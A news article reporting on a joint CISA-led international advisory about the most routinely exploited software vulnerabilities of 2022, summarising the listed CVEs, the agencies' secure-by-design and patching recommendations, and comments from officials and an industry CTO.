Global cybersecurity authorities release details on top routinely exploited vulnerabilities in 2022

Global cybersecurity agencies reveal in their latest cybersecurity advisory that in 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. It also detailed CVEs (Common Vulnerabilities and Exposures) routinely and frequently exploited by malicious cyber actors in 2022, along with associated Common Weakness Enumerations (CWEs). 

Furthermore, the notice disclosed that malicious cyber actors continued exploiting known software vulnerabilities to target unpatched systems and applications, including some vulnerabilities that have been known for more than five years. 

“Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors,” the advisory published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI); Australian Signals Directorate’s Australian Cyber Security Centre (ACSC); Canadian Centre for Cyber Security (CCCS); New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT-NZ); and the U.K.’s National Cyber Security Centre. 

“Malicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure—the value of such vulnerabilities gradually decreases as software is patched or upgraded,” the advisory identified. “Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).”

The advisory added that malicious cyber hackers likely prioritize developing exploits for severe and globally prevalent CVEs. “While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years.” 

Additionally, cyber hackers likely give higher priority to vulnerabilities that are more prevalent in their specific targets’ networks. “Multiple CVE or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection,” the notice revealed.

Eric Goldstein, executive assistant director for cybersecurity at CISA, said in a media statement that adversaries commonly exploit categories of vulnerabilities that can and must be addressed by technology providers as part of their commitment to secure by design. 

“Until that day, malicious actors will continue to find it far too easy to exploit organizations around the world,” according to Goldstein. “With our partners, we urge all organizations to review our joint advisory, for every enterprise to prioritize mitigation of these vulnerabilities, and for every technology provider to take accountability for the security outcomes of their customers by reducing the prevalence of these vulnerabilities by design.”

“Organizations continue using unpatched software and systems, leaving easily discovered openings for cyber actors to target,” Neal Ziring, technical director for NSA’s Cybersecurity Directorate, said in an NSA media statement. “Older vulnerabilities can provide low-cost and high impact means for these actors to access sensitive data.”

The global agencies have identified the top 12 vulnerabilities that the co-authors have observed malicious cyber actors routinely exploiting in 2022.

The CVE-2018-13379 vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.

The CVE-2021-34473, CVE-2021-31207, and CVE-2021-34523 vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.

The CVE-2021-40539 vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine AD SelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.

The CVE-2021-26084 vulnerability affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. The vulnerability became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.

The CVE-2021-44228 vulnerability, known as Log4Shell, affected Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021-44228 through the first half of 2022.

The CVE-2022-22954 and CVE-2022-22960 vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.

The CVE-2022-1388 vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software. 

The CVE-2022-30190 vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.

The critical RCE vulnerability CVE-2022-26134 impacts Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability (CVE-2021-26084), which cyber actors also exploited in 2022.

The authoring agencies recommend that vendors and developers implement secure-by-design and -default principles and tactics to reduce the prevalence of vulnerabilities in the software. They suggest following the Secure Software Development Framework (SSDF), also known as SP 800-218, and implement secure design practices into each stage of the software development life cycle (SDLC). As part of this, establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities.

The agencies also advise prioritizing secure-by-default configurations, such as eliminating default passwords, or requiring additional configuration changes to enhance product security. They also call for ensuring that published CVEs include the proper CWE field identifying the root cause of the vulnerability.

When it comes to end-user organizations, the global agencies suggest applying timely patches to systems; implementing a centralized patch management system; and using security tools, such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers. They also recommend asking software providers to discuss their secure by design program and to provide links to information about how they are working to remove classes of vulnerabilities and to set secure default settings.

Commenting on the latest cybersecurity advisory, Ron Fabela, CTO of XONA Systems wrote in an emailed statement that in continued efforts to amplify the ‘secure by design’ challenge CISA, along with international partners, released the 2022 Top Routinely Exploited Vulnerabilities advisory today. 

“While all identified CVEs affect traditional enterprise technologies, these systems are often the gateway into critical infrastructure attacks,” according to Fabela. “Although no OT specific CVEs are listed in this advisory, critical environments rely heavily on supporting enterprise infrastructure, inheriting these routinely exploited attack surface threats, and must be considered in overall IT/OT security planning.”

Fabela added that it’s well known that threat actors will only use the bare minimum needed to gain access and achieve their objectives. “As long as un-patched perimeter and user access systems have years old vulnerabilities in production, these will be the preferred methods for initial access. For instance, the first Fortinet SSL bug for VPNs is still being exploited 3 years later.”

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.